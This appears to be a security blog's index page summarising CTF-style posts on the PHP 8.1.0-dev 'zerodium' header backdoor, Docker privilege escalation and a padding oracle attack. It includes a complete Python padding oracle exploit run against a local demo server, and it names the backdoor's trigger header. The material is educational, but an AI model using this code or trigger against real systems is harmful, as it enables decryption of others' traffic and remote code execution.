My Infosec Blog - Stay curious !
$ ls -la .contact: flast101.sec@gmail.com
$(whoami): Me, Myself and I.
Hack The Box writeups: here are walkthroughs to root machines on the HackTheBox website, an online platform for learning and teaching cyber security.
Writeups list:
23 May 2021
PHP 8.1.0-dev Backdoor System Shell Script
PHP version 8.1.0-dev (the development branch, never a tagged release) had a backdoor committed to its git repository on March 28th 2021; the malicious code was discovered and removed within hours. If a build made from the compromised source runs on a server, an attacker can execute arbitrary code simply by sending a crafted User-Agentt header (note the double "t"): when the header value starts with "zerodium", the rest of the value is evaluated as PHP code.
The original code was restored after the first malicious commit was discovered, but the repository was then tampered with a second time. Had the change reached a release, every website running the compromised version of PHP would have carried a backdoor, giving attackers remote code execution on the site.
I wrote a short exploit script using the backdoor to provide a pseudo system shell on the host.
Read more …
9 August 2020
Privilege escalation in Docker
In this article, I talk about a classic privilege escalation through Docker containers. It is a very well known trick, used when too many accounts are allowed to run docker (typically through membership of the docker group), and you will have to do it in at least a few CTF boxes. Unfortunately, it is not always correctly understood.
I had a lot of fun the first time I encountered it in the PWK lab as well as the second time on a HTB machine.
Let’s see what it is about.
Read more …
7 August 2020
My Reverse Shell Cheat Sheet
You can find them all around the internet. I couldn't find them all in one place, so I wrote them down here. Don't hesitate to tell me if you find some more and I will add them to this list.
Read more …
4 July 2020
Padding Oracle attack fully explained and coded from scratch in Python3
The padding oracle attack is a spectacular attack: it lets an attacker decrypt an intercepted message that was encrypted in CBC mode, without the key, as long as the receiver reveals whether the padding of a submitted ciphertext is valid. POODLE (Padding Oracle On Downgraded Legacy Encryption) is a man-in-the-middle exploit that takes advantage of browsers' and other clients' fallback to SSL 3.0. When attackers successfully exploit it, they need on average 256 SSL 3.0 requests to reveal one byte of the encrypted message.
The only requirement is a server response that tells us whether the padding was accepted; that response is the oracle (the article comes back to it in detail). With it, the entire message can be decrypted except the first block, which additionally requires knowing the initialization vector.
In this article, we focus on how to use this vulnerability and propose a Python script that exploits the padding oracle to decrypt a message encrypted with AES-CBC.
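As an added, self-contained illustration of the attack described above (this is not the script from the article), the code below implements PKCS#7 padding, CBC mode, a server that leaks only "padding valid / invalid", and the attacker side that recovers the plaintext one byte at a time. One assumption to be aware of: to stay on the standard library, a small HMAC-SHA256 Feistel network stands in for AES. The attack never looks inside the block cipher, so swapping in AES changes nothing on the attacker's side. The sample message and the server's random key are constructed for the demo.

```python
"""Padding oracle attack on CBC, coded from scratch with the stdlib only (added example)."""
import hashlib
import hmac
import os

BLOCK = 16  # AES block size; the attack depends on this, never on the cipher itself
SECRET = b"Stay curious! The padding oracle leaks one bit per query."  # constructed sample

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Toy block cipher: 4-round Feistel network keyed via HMAC-SHA256. Assumption: it stands
# in for AES so nothing third-party is needed; the attack never looks inside it.
def _f(key, rnd, half):
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key, blk):
    left, right = blk[:8], blk[8:]
    for rnd in range(4):
        left, right = right, xor(left, _f(key, rnd, right))
    return left + right

def block_decrypt(key, blk):
    left, right = blk[:8], blk[8:]
    for rnd in reversed(range(4)):
        left, right = xor(right, _f(key, rnd, left)), left
    return left + right

def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, pt):
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, ct):
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        out.append(xor(block_decrypt(key, ct[i:i + BLOCK]), prev))
        prev = ct[i:i + BLOCK]
    return b"".join(out)

class VulnerableServer:
    """Owns the key and leaks exactly one bit per request: did the padding check pass?"""
    def __init__(self):
        self.key, self.queries = os.urandom(16), 0

    def encrypt(self, pt):
        iv = os.urandom(BLOCK)
        return iv, cbc_encrypt(self.key, iv, pkcs7_pad(pt))

    def padding_is_valid(self, iv, ct):
        self.queries += 1
        try:
            pkcs7_unpad(cbc_decrypt(self.key, iv, ct))
            return True
        except ValueError:
            return False

def recover_block(oracle, prev, target):
    """Attacker side: learn D(target) byte by byte through a forged IV, then XOR with prev."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos                        # force padding 0x01, then 0x02 0x02, ...
        forged = bytearray(BLOCK)
        forged[pos + 1:] = bytes(b ^ pad for b in inter[pos + 1:])  # known bytes -> pad
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged), target):
                continue
            if pos == BLOCK - 1:
                # Edge case: the hit may be padding 0x02 0x02 (or longer), not 0x01. Flipping
                # the preceding byte keeps 0x01 valid but breaks any longer padding.
                forged[pos - 1] ^= 0xFF
                real = oracle(bytes(forged), target)
                forged[pos - 1] ^= 0xFF
                if not real:
                    continue
            inter[pos] = guess ^ pad
            break
        else:
            raise RuntimeError("oracle accepted no padding at all; is it really an oracle?")
    return xor(bytes(inter), prev)

def padding_oracle_attack(oracle, ct, iv=None):
    """Decrypt a whole CBC message; without the IV the first block cannot be recovered."""
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    if iv is not None:
        blocks.insert(0, iv)
    pt = b"".join(recover_block(oracle, blocks[i - 1], blocks[i]) for i in range(1, len(blocks)))
    return pkcs7_unpad(pt)

def demo():
    server = VulnerableServer()
    iv, ct = server.encrypt(SECRET)
    with_iv = padding_oracle_attack(server.padding_is_valid, ct, iv)
    without_iv = padding_oracle_attack(server.padding_is_valid, ct)
    return with_iv, without_iv, server.queries
```

`demo()` returns the fully recovered message when the IV is known, the message minus its first 16 bytes when it is not, and the number of oracle queries spent, which stays well under 256 per byte on average since the loop stops at the first accepted guess. The last-byte double check is the edge case most from-scratch implementations forget: roughly one block in 256 will otherwise be decrypted wrongly.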
Read more …
Stay curious !